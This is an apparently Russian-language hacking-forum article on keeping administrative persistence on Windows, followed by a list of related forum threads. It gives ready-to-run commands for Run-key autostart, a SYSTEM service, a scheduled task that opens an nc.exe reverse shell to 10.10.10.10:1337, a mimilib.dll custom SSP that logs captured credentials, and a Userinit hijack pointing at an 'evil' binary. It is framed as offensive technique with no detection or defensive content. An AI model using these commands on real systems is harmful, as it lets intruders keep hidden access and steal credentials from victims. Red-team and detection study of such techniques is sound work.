Статья Техники персистентности в Windows для административного доступа

devqp

Специалист
Персистентность — методы сохранения доступа к системе после перезагрузок, смены учётных данных и других прерываний. Рассмотрим техники для административного уровня.

Реестр: автозапуск
Добавление записей в ключи реестра запускает программы при входе пользователя с его уровнем прав:
Код:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Службы
Службы запускаются при загрузке ОС с правами SYSTEM. Создание службы:
Код:
sc create redteam binpath= "PATH TO BINARY" start="auto" obj="LocalSystem"

Планировщик задач
Задачи выполняются при старте системы или по расписанию. Пример создания:
Код:
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 10.10.10.10 1337 -e cmd.exe'

Для удалённого создания:
Код:
schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password

Кастомный SSP (Security Support Provider)
Внедрение DLL для перехвата учётных данных:
1. Скопировать mimilib.dll в SYSTEM32
2. Добавить в реестр:
Код:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f
3. Проверить:
Код:
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
Учётные данные сохраняются в SYSTEM32\kiwissp.txt.

Контекстное меню Windows
Использование уязвимостей контекстного меню (правый клик) для выполнения кода. Инструмент: ContextMenuHijack (GitHub).

Модификация Userinit
Добавление исполняемого файла в ключ Winlogon:
Код:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Some\Evil\Binary.exe","C:\Windows\system32\userinit.exe"
 
Похожие темы
devqp Статья Техники маскировки фишинговых ресурсов от поисковых систем Фишинг, мошенничество, СИ 0
Admin UFOLABSNEWS Microsoft предупредила о новой волне фишинговых атак с использованием техники ASCII Smuggling. Новости в сети 0
devqp Статья Техники персистенции в Windows с правами администратора Уязвимости и взлом 0
devqp Статья Техники персистенции в пользовательском режиме: методы и инструменты Уязвимости и взлом 0
Admin Интересно Новое топливо CycloKinetics увеличит дальность и эффективность военной техники. Новости в сети 0
Admin Интересно Удаленный запуск кода и захват системы. Владельцам техники GIGABYTE нужно срочно обновить софт. Новости в сети 0
Admin Интересно Конфликт на Ближнем Востоке удорожает и задерживает поставки техники. Новости в сети 0
АнАлЬнАя ЧуПаКаБрА INLINE Shop техники с коинами Готовый софт 0
K Эволюция гипноза. Новейшие техники активации сознания. Жан Беккио Раздачи и сливы 0
K Техники современной гипнотерапии. Гипноз. Практика. Раздачи и сливы 0
devqp Статья Реализация API для блокировки Windows-ПК на Rust Полезные статьи 0
Admin UFOLABSNEWS Новый вредоносный код для Windows использует ИИ для принятия решений. Новости в сети 0
Admin UFOLABSNEWS Касперский искал вирус, а нашел настройки Windows. Хакеры взломали завод без единой вредоносной программы. Новости в сети 0
Admin UFOLABSNEWS Microsoft объяснила причины потери удобств Windows 10 в новой версии системы. Новости в сети 0
Admin UFOLABSNEWS Китайские хакеры используют уязвимости Chrome и Windows для распространения бэкдора GRIMWEDGE. Новости в сети 0
Admin UFOLABSNEWS Windows ещё не загрузилась, защита уже проиграла. Драйвер AOMEI даёт код на уровне UEFI. Новости в сети 0
Admin UFOLABSNEWS Кибершпионы используют новый набор эксплойтов BlueMoon для атак через уязвимости в Windows и Chrome. Новости в сети 0
Admin UFOLABSNEWS Четыре шпионские группы использовали один и тот же набор эксплойтов для Chrome и Windows в течение недели. Новости в сети 0
Admin UFOLABSNEWS Microsoft возвращает пользователям Windows 11 привычный интерфейс после пяти лет споров. Новости в сети 0
Admin UFOLABSNEWS Microsoft готовит Project Zenith — отдельную Windows для программистов. Новости в сети 0
Admin UFOLABSNEWS Обнаружены четыре модуля REVSTEALER, отключающие защиту Windows для майнинга криптовалюты. Новости в сети 0
Admin UFOLABSNEWS Новое обновление Windows 11 вызывает проблемы с рабочим столом. Новости в сети 0
Admin UFOLABSNEWS Windows 11 научится определять возраст пользователя без личных данных. Новости в сети 0
Admin UFOLABSNEWS Обновление Windows 11 KB5120998 сбрасывает настройки мыши. Новости в сети 0
Admin UFOLABSNEWS Microsoft добавила долгожданную функцию в OneDrive для Windows 11. Новости в сети 0
Admin UFOLABSNEWS Microsoft выпустила обновление KB5120998 для Windows 11 с 35 изменениями и исправлениями. Новости в сети 0
devqp Статья Автоматическая блокировка Windows при подключении неизвестных USB-устройств Уязвимости и взлом 0
Admin UFOLABSNEWS Microsoft полностью переписала диалог «Свойства» в Windows 11. Новости в сети 0
Admin UFOLABSNEWS Обнаружен эксплойт Certighost, позволяющий атаковать домены Windows. Новости в сети 0
devqp Статья Скрытый автозапуск Amadey: анализ недетектируемого метода через реестр Windows Вирусология 0
Admin Интересно Windows 11 показала тройное превосходство над Linux в локальных ИИ-задачах. Новости в сети 0
Admin Интересно Windows-серверы застряли без обновлений. Microsoft признала масштабный сбой WSUS. Новости в сети 0
devqp Статья Обнаружение защитных решений в Windows после компрометации Уязвимости и взлом 0
Admin Интересно Исследователь опубликовал эксплойт для уязвимости в Windows после обновления Microsoft. Новости в сети 0
Admin Интересно Microsoft выпустила расширенное обновление безопасности KB5099539 для Windows 10. Новости в сети 0
devqp Статья DEFUSB: Автоматическая блокировка Windows при подключении неизвестных USB-устройств Анонимность и приватность 0
Admin UFOLABSNEWS Microsoft увеличит объем исправлений безопасности в Windows 11. Новости в сети 0
Admin UFOLABSNEWS Windows временно потеряла долю рынка из-за ошибки в подсчётах StatCounter. Новости в сети 0
devqp Статья Развертывание Мобильной Socks5 Прокси-Фермы с UDP и Сменным Fingerprint в Windows Анонимность и приватность 0
Admin UFOLABSNEWS Microsoft изменит подход к резервному копированию настроек в Windows 11 26H2. Новости в сети 0
Admin UFOLABSNEWS Microsoft запускает функцию восстановления Windows 11 Cloud Rebuild, которая обходит использование USB. Новости в сети 0
Admin UFOLABSNEWS Valve выпустила обновление Proton, которое расширяет совместимость игр для Windows на Linux. Новости в сети 0
Admin UFOLABSNEWS ФБР использовало идентификатор устройства Windows для отслеживания хакера. Новости в сети 0
Admin UFOLABSNEWS Опасная ошибка в Windows 11 незаметно потребляет сотни гигабайт памяти. Новости в сети 0
Admin UFOLABSNEWS Античит-драйвер оказался уязвимым и позволяет повышать привилегии в Windows. Новости в сети 0
Admin UFOLABSNEWS Эксплойт The Gentlemen обходит защиту Windows на уровне ядра. Новости в сети 0
Admin UFOLABSNEWS Microsoft тестирует новый облик меню «Пуск» в Windows 11. Новости в сети 0
Admin UFOLABSNEWS Microsoft представила новую функцию восстановления системы в Windows 11. Новости в сети 0
Admin UFOLABSNEWS Windows 11 получила функцию полного отката системы к предыдущему состоянию. Новости в сети 0
Admin UFOLABSNEWS Microsoft подтвердила ошибку в июньском обновлении Windows, вызывающую отображение странных имён файлов. Новости в сети 0

Название темы